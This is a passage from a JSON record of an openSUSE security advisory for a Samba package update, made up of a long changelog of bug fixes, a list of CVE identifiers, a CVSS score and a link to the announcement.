(bso#11244).\n - s4: libcli/finddcs_cldap: continue processing CLDAP until all addresses\n are used; (bso#11284).\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n - spoolss: purge the printer name cache on name change; (bso#11210);\n (boo#901813).\n - CTDB statd-callout does not scale; (bso#11204).\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n - Multiplexed RPC connections are not handled by DCERPC server;\n (bso#11225).\n - Fix terminate connection behavior for asynchronous endpoint with PUSH\n notification flavors; (bso#11226).\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script; (bso#11007).\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and 1125553;\n (bso#11201).\n - SMB2 should cancel pending NOTIFY calls with DELETE_PENDING if the\n directory is deleted; (bso#11257).\n - s3:winbindd: make sure we remove pending io requests before closing\n client\n - 'sharesec' output no longer matches input format; (bso#11237).\n - waf: Fix systemd detection; (bso#11200).\n - CTDB: Fix portability issues; (bso#11202).\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n - CTDB statd-callout does not scale; (bso#11204).\n - 'net ads dns gethostbyname' crashes with an error in TALLOC_FREE if you\n enter invalid values; (bso#11234).\n - libads: record service ticket endtime for sealed ldap connections;\n - lib/util: Include DEBUG macro in internal header files before\n samba_util.h; (bso#11033).\n - Initialize dwFlags field of DNS_RPC_NODE structure; (bso#9791).\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't set, cope with\n servers that don't send the 2 unused fields; (bso#10016).\n - build:wafadmin: Fix use of spaces instead of tabs; (bso#10476).\n - waf: Fix the build on openbsd; (bso#10476).\n - s3: client: "client use spnego principal = yes" code checks wrong name;\n - spoolss: Retrieve published printer GUID if not in registry; (bso#11018).\n - vfs_fruit: Enhance handling of malformed AppleDouble files; (bso#11125).\n - backupkey: Explicitly link to gnutls and gcrypt; (bso#11135).\n - replace: Remove superfluous check for gcrypt header; (bso#11135).\n - Backport subunit changes; (bso#11137).\n - libcli/auth: Match Declaration of netlogon_creds_cli_context_tmp with\n implementation; (bso#11140).\n - s3-winbind: Fix cached user group lookup of trusted domains; (bso#11143).\n - talloc: Version 2.1.2; (bso#11144).\n - Update libwbclient version to 0.12; (bso#11149).\n - brlock: Use 0 instead of empty initializer list; (bso#11153).\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n - Fix lots of winbindd zombie processes on Solaris platform; (bso#11175).\n - Prevent samba package updates from disabling samba kerberos printing.\n - Add sparse file support for samba; (fate#318424).\n - Simplify libxslt build requirement and README.SUSE install.\n - Remove no longer required cleanup steps while populating the build root.\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT; (bso#1115).\n - pam_winbind: fix warn_pwd_expire implementation; (bso#9056).\n - nsswitch: Fix soname of linux nss_*.so.2 modules; (bso#9299).\n - Make 'profiles' work again; (bso#9629).\n - s3:smb2_server: protect against integer wrap with "smb2 max credits =\n 65535"; (bso#9702).\n - Make validate_ldb of String(Generalized-Time) accept millisecond format\n ".000Z"; (bso#9810).\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n - vfs: Add glusterfs manpage; (bso#10240).\n - Make 'smbclient' use cached creds; (bso#10279).\n - pdb: Fix build issues with shared modules; (bso#10355).\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n - idmap: Return the correct id type to *id_to_sid methods; (bso#10720).\n - printing/cups: Pack requested-attributes with IPP_TAG_KEYWORD;\n (bso#10808).\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n - nss_winbind: Add getgroupmembership for FreeBSD; (bso#10835).\n - idmap_rfc2307: Fix a crash after connection problem to DC; (bso#10837).\n - s3: smb2cli: query info return length check was reversed; (bso#10848).\n - s3: lib, s3: modules: Fix compilation on Solaris; (bso#10849).\n - lib: uid_wrapper: Fix setgroups and syscall detection on a system\n without native uid_wrapper library; (bso#10851).\n - winbind3: Fix pwent variable substitution; (bso#10852).\n - Improve samba-regedit; (bso#10859).\n - registry: Don't leave dangling transactions; (bso#10860).\n - Fix build of socket_wrapper on systems without SO_PROTOCOL; (bso#10861).\n - build: Do not install 'texpect' binary anymore; (bso#10862).\n - Fix testparm to show hidden share defaults; (bso#10864).\n - libcli/smb: Fix smb2cli_validate_negotiate_info with min=PROTOCOL_NT1\n max=PROTOCOL_SMB2_02; (bso#10866).\n - Integrate CTDB into top-level Samba build; (bso#10892).\n - samba-tool group add: Add option '--nis-domain' and '--gid'; (bso#10895).\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n - spoolss: Fix handling of bad EnumJobs levels; (bso#10898).\n - Fix smbclient loops doing a directory listing against Mac OS X 10 server\n with a non-wildcard path; (bso#10904).\n - Fix print job enumeration; (bso#10905); (boo#898031).\n - samba-tool: Create NIS enabled users and unixHomeDirectory attribute;\n (bso#10909).\n - Add support for SMB2 leases; (bso#10911).\n - btrfs: Don't leak opened directory handle; (bso#10918).\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored;\n (bso#10920).\n - s3:smbd: Fix file corruption using "write cache size != 0"; (bso#10921).\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n - s3-keytab: fix keytab array NULL termination; (bso#10933).\n - s3:passdb: fix logic in pdb_set_pw_history(); (bso#10940).\n - Cleanup add_string_to_array and usage; (bso#10942).\n - dbwrap_ctdb: Pass on mutex flags to tdb_open; (bso#10942).\n - Fix RootDSE search with extended dn control; (bso#10949).\n - Fix 'samba-tool dns serverinfo <server>' for IPv6; (bso#10952).\n - libcli/smb: only force signing of smb2 session setups when binding a new\n session; (bso#10958).\n - s3-smbclient: Return success if we listed the shares; (bso#10960).\n - s3-smbstatus: Fix exit code of profile output; (bso#10961).\n - socket_wrapper: Add missing prototype check for eventfd; (bso#10965).\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows\n client does; (bso#10966).\n - vfs_streams_xattr: Check stream type; (bso#10971).\n - s3: smbd: Fix *allocate* calls to follow POSIX error return convention;\n (bso#10982).\n - vfs_fruit: Add support for AAPL; (bso#10983).\n - Fix spoolss IDL response marshalling when returning error without\n clearing info; (bso#10984).\n - dsdb-samldb: Check for extended access rights before we allow changes to\n userAccountControl; (bso#10993); CVE-2014-8143; (boo#914279).\n - Fix IPv6 support in CTDB; (bso#10996).\n - ctdb-daemon: Use correct tdb flags when enabling robust mutex support;\n (bso#11000).\n - vfs_streams_xattr: Add missing call to SMB_VFS_NEXT_CONNECT; (bso#11005).\n - s3-util: Fix authentication with long hostnames; (bso#11008).\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n - packaging: Include CTDB man pages in the tarball; (bso#11014).\n - pdb_get_trusteddom_pw() fails with non valid UTF16 random passwords;\n (bso#11016).\n - Make Sharepoint search show user documents; (bso#11022).\n - nss_wrapper: check for nss.h; (bso#11026).\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n - lib/util: Avoid collision which alread defined consumer DEBUG macro;\n (bso#11033).\n - winbind: Retry after SESSION_EXPIRED error in ping-dc; (bso#11034).\n - s3-libads: Fix a possible segfault in kerberos_fetch_pac(); (bso#11037).\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n - vfs_fruit: mmap under FreeBSD needs PROT_READ; (bso#11040).\n - Fix authentication using Kerberos (not AD); (bso#11044).\n - net: Fix sam addgroupmem; (bso#11051).\n - vfs_snapper: Correctly handles multi-byte DBus strings; (bso#11055);\n (boo#913238).\n - cli_connect_nb_send: Don't segfault on host == NULL; (bso#11058).\n - utils: Fix 'net time' segfault; (bso#11058).\n - libsmb: Provide authinfo domain for encrypted session referrals;\n (bso#11059).\n - s3-pam_smbpass: Fix memory leak in pam_sm_authenticate(); (bso#11066).\n - vfs_glusterfs: Add comments to the pipe(2) code; (bso#11069).\n - vfs/glusterfs: Change xattr key to match gluster key; (bso#11069).\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n - s3-vfs: Fix developer build of vfs_ceph module; (bso#11070).\n - s3: netlogon: Ensure we don't call talloc_free on an uninitialized\n pointer; (bso#11077); CVE-2015-0240; (boo#917376).\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n - s3: smbclient: Allinfo leaves the file handle open; (bso#11094).\n - Fix Win8.1 Credentials Manager issue after KB2992611 on Samba domain;\n (bso#11097).\n - debug: Set close-on-exec for the main log file FD; (bso#11100).\n - s3: smbd: leases - losen paranoia check. Stat opens can grant leases;\n (bso#11102).\n - s3: smbd: SMB2 close. If a file has delete on close, store the return\n info before deleting; (bso#11104).\n - doc:man:vfs_glusterfs: improve the configuration section; (bso#11117).\n - snprintf: Try to support %j; (bso#11119).\n - ctdb-io: Do not use sys_write to write to client sockets; (bso#11124).\n - doc-xml: Add 'sharesec' reference to 'access based share enum';\n (bso#11127).\n - Fix usage of freed memory on server exit; (bso#11218); (boo#919309).\n - Adjust baselibs.conf due to libpdb0 package rename to libsamba-passdb0.\n - Add libsamba-debug, libsocket-blocking, libsamba-cluster-support, and\n libhttp to the libs package; (boo#913547).\n - Rebase File Server Remote VSS Protocol (FSRVP) server against 4.2.0rc1;\n (fate#313346).\n\n", "edition": 1, "reporter": "Suse", "published": "2016-04-17T15:11:14", "title": "Security update for samba (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5330", "CVE-2016-2112", "CVE-2016-2118", "CVE-2015-3223", "CVE-2015-7560", "CVE-2015-5296", "CVE-2015-8467", "CVE-2015-5252", "CVE-2016-2110", "CVE-2016-2113", "CVE-2015-0240", "CVE-2016-2115", "CVE-2014-8143", "CVE-2015-5370", "CVE-2015-5299", "CVE-2016-2111"], "modified": "2016-04-17T15:11:14", "id": "OPENSUSE-SU-2016:1064-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00042.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
